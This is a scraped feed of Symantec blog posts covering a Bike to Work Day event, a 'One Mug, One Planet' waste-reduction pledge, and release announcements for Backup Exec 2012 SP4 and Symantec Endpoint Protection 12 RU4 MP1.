  • Added code that sets the proper RSS URL (by default) on filterable list pages. The old behavior was to not set an RSS URL until a filter was selected. This was causing SEO issues since web crawlers were unable to read the default RSS URL as they crawled the pages.
  • Added contextual code that places a "rel=nofollow" attribute on hyperlinks posted by untrusted users (aka spammers).

Every Day is Bike to Work Day in the Month of May


According to a new US Census Bureau survey, the number of people who commute to work by bicycle increased about 60% over the past decade; however, bicyclists still account for less than 1% of all commuters.

This increase in biking to work can be partly attributed to groups across the country that are working hard to promote and support biking in their local communities.

We are proud to partner each year with one such organization, the Silicon Valley Bike Coalition, as part of the organization’s annual Bike to Work Day event. This year Bike to Work Day was held on May 8th, and as with previous years, Symantec hosted an Energizer Station where riders stopped by for snacks, drinks, free give-aways, and to chat with fellow riders. We raffled off prizes for employees including bike safety lights, a tool kit with 16 multifunction bike tools, and other free bike-related gifts.


Over 138 bike riders and over 40 Symantec employees dropped by Symantec’s Energizer Station in Mountain View for drinks, photos and free give-aways.


A biker signs in at Symantec’s Energizer station.

This year we also set up a photo booth with fun props so riders could snap a memorable photo of their ride to work. Additionally, two weeks prior to the event we hosted a safety presentation to ensure employees, no matter what their experience riding, were prepared for the day.


There’s always time for pictures! Bikers go wild at the BTWD photo booth.


More fun at the BTWD photo booth.

 

Each year I look forward to this event, where we help the SVBC promote its mission to increase biking in Silicon Valley, while also encouraging our employees to choose a healthier and more environmentally friendly commute option. The SVBC is pivotal in supporting this cause in the Bay Area, and does so through a variety of programs such as setting up dedicated bike paths, encouraging the uptake of biking versus driving, educating both adults and children on safe biking practices, and advocating for government policies that support and protect bikers.

Missed Bike to Work Day? It’s Not Too Late

If you missed Bike to Work Day there is still plenty of time!

This year, Symantec has also joined the SVBC’s Company Bike Challenge (CBC), a fun and friendly cycling competition among companies throughout the Bay Area that encourages friends and colleagues to commute by bike during the month of May. Cyclists competing in the Team Bike Challenge will earn points for their team and company every time they ride their bike to work, the park, or any other destination.

If you haven’t joined Symantec’s Company Bike Challenge team, please do so. The more riders, the more points we get! To date, we have 27 members, and through the SVBC’s interactive online portal we are tracking the number of trips, GHG emissions saved, calories burned and miles cycled (see picture below). 


SVBC’s Company Bike Challenge provides an interactive website for teams that tracks miles cycled, lbs of CO2 saved and calories burned.

Make Every Day Bike to Work Day 

There are many reasons I choose to ride my bike to work (not every day, but as often as I can) – reducing my impact on the environment, increasing my daily exercise, and finding opportunities to commute with friends and family. But most importantly, I just enjoy it.

Thanks to all who came out and took part in Bike to Work Day this year, whether biking to work on the 8th, participating in the Company Bike Challenge, or volunteering to make our Energizer Station possible. Many thanks to George Schnurle, Jaya Wadhwani, Jaime Barclay, Ashley Savageau, Spike Burkhardt, Rod Cello, Ben Cota, Russell Hill, and Elisa Ewing, who volunteered at our Energizer Station; some rode their bikes to work as well.

We also hope this Bike to Work Day has convinced a few new riders to start a bike commute, and has reminded others why they choose to do it every day.  If we have convinced just a few new people to bike to work more often, we consider this day and month a success!

To join Symantec’s CBC team or for any questions about Bike to Work Day, please contact Environmental Responsibility at Environmental_Responsibility@symantec.com.

 

Anand Raj Vengadassalam is a Technical Support Engineer and member of the Symantec Mountain View Green Team

 

Celebrating Earth Day Every Day, Through the "One Mug, One Planet" Pledge

$
0
0

Today is Earth Day, a day where people across the world come together to celebrate our planet and the need to protect the valuable resources it provides us.

According to the World Wildlife Fund (WWF), “we currently consume 50 percent more natural resources than the Earth's ecosystems can replenish.” Additionally, if we continue to consume the way we do, by 2030 the resources of two planets will not be enough to support our population.

While it may seem that what you do as an individual makes little difference, the exact opposite is true.

Let’s take your morning coffee cup for example. Did you know that:

  • Every minute over one million disposable cups are discarded to landfill.
  • In the United States, 16 billion cups were used for coffee as of 2006. This equals about 6.5 million trees.
  • Using one disposable cup per day results in 23 lbs of waste per year, just from the cups that are thrown away.
  • A reusable coffee mug is designed to be used about 3,000 times in its life, and provides about eight years of use for the average daily coffee drinker. That is compared with approximately 3,000 throw-away cups.
  • In 2013, five Symantec sites used approximately 2 million cups.

If one person used a reusable mug every day this year it would save 87 lbs of CO2. If all Symantec employees used a reusable mug every day for one year it would save 1,883,400 lbs of CO2.

As you can see, some of the most important steps to minimizing our impacts on the planet are a combination of individual acts.

At Symantec, waste management is central to our environmental strategy and we’ve therefore set a goal to reduce paper cup usage by 15 percent, and to achieve 80 percent waste diversion at all of our audited sites.

To do this, we’ve launched the “One Mug, One Planet” campaign to help reduce waste across our operations and encourage all employees to think about the impacts they make both inside and outside the office.

We’re asking all employees to sign the “One Mug, One Planet” pledge and make a commitment to use a reusable mug every day. Our goal is 2,500 pledges signed across Symantec, and 10 percent of employees at sites that have opted in to join this campaign.

As part of the campaign, employees will take “Mug Shots,” pictures of themselves, their colleagues, or their team with a reusable mug. We’ve also asked employees to use their Mug Shot to encourage colleagues to sign the pledge by sharing via email and posting to Facebook, LinkedIn, and Twitter using the hashtags #1mug1planet #Symantec.

The most creative Mug Shot will win a prize announced at the end of the campaign.

Additionally, we are handing out free reusable mugs for those that sign up to the pledge AND send us a mug shot – so there’s no excuse not to reuse!

The saying “Every day is Earth Day” really is true and if we all follow this, we may be surprised what our collective efforts can achieve. You have to start somewhere, right? Why not start with your coffee cup!  

Symantec employees: Interested in signing your site up to our waste reduction campaign? Or interested in joining the Green Teams? Email Environmental_Responsibility@symantec.com for more information.

Have you snapped a MugShot yet? If not, do so and send to Environmental_Responsibility@symantec.com!

 

Chris Abess is Symantec's Vice President, Sales Operations, and Global Green Team Executive Champion.

[7] Based on 2000 study by Starbucks that calculated the average paper-based coffee cup produced 0.24 lb of CO2 – assumes 21,500 Symantec employees, one cup per day, 365 days per year; http://www.ecopedia.com/environment/reusable-coffee-cups-a-simple-step-for-a-huge-impact/

[8] Mountain View, CA; Springfield, OR; Dublin, IR; Auckland, NZ; Sydney, AUS; Heathrow, FL.

Learning on our dime: lessons from the largest software-defined data center in the world


At Symantec, we walked the walk when it came to making our own IT agile. We also learned a lot by boldly embracing some of the cutting edge technologies and developing solutions to fill the gaps. Drew Meyer walks through some of the company's journeys in developing an agile data center.

Backup Exec 2012 Service Pack 4 is Available Now


The Backup Exec 2012 Service Pack 4 (SP4) is now available for download and adds support for Enterprise Vault 10.0.3 and Enterprise Vault 10.0.4.

How to download the service pack

If you are an existing customer and would like to download the latest Backup Exec service pack, please visit: http://www.symantec.com/business/support/index?page=content&id=TECH212772. From there download the EXE at the bottom of the page.
 

Latest Symantec Endpoint Protection Release - SEP 12 RU4 MP1 (12.1.4100.4126)


Hello Everyone,

Symantec Endpoint Protection 12 RU4 MP1 is released.

This build's version is: 12.1.4100.4126

What's new in this release:

Extended upgrade support

  • Unlike most maintenance patch releases, you can upgrade any version of Symantec Endpoint Protection directly to 12.1.4.1. Unsupported downgrade paths still apply.

Expanded operating system support

  • The Symantec Endpoint Protection (SEP) client is now supported on Windows To Go (Windows 8.1 Enterprise).
  • Symantec Endpoint Protection Manager (SEPM), the SEP client, and the Symantec Network Access Control client are now supported on Windows 8.1 Update 1.
  • SEPM, the SEP client, and the Symantec Network Access Control client are now supported on Windows Server 2012 R2 Update 1.

Note: If you do not see the SEP 12 RU4 MP1 release on FlexNet, you may see it in your FileConnect account in the coming few days.

You can find the latest release of Symantec Endpoint Protection 12 RU4 MP1 at: https://symantec.flexnetoperations.com/control/symc/registeranonymouslicensetoken

Product Related Articles:

Title: Upgrading or migrating to Symantec Endpoint Protection 12.1.4.1 (RU4 MP1)
Document ID: TECH216176
Article URL: http://www.symantec.com/docs/TECH216176  

Title: New fixes and features in Symantec Endpoint Protection 12.1.4.1 (RU4 MP1)
Document ID: TECH216262
Article URL: http://www.symantec.com/docs/TECH216262

Title: Symantec Endpoint Protection, Symantec Endpoint Protection Small Business Edition, and Symantec Network Access Control 12.1.4.1 Release Notes/What’s New
Document ID: DOC7313
Article URL: http://www.symantec.com/docs/DOC7313

Title: System Requirements for Symantec Endpoint Protection, Enterprise and Small Business Editions, and Network Access Control 12.1.4
Document ID: TECH216260
Article URL: http://www.symantec.com/docs/TECH216260
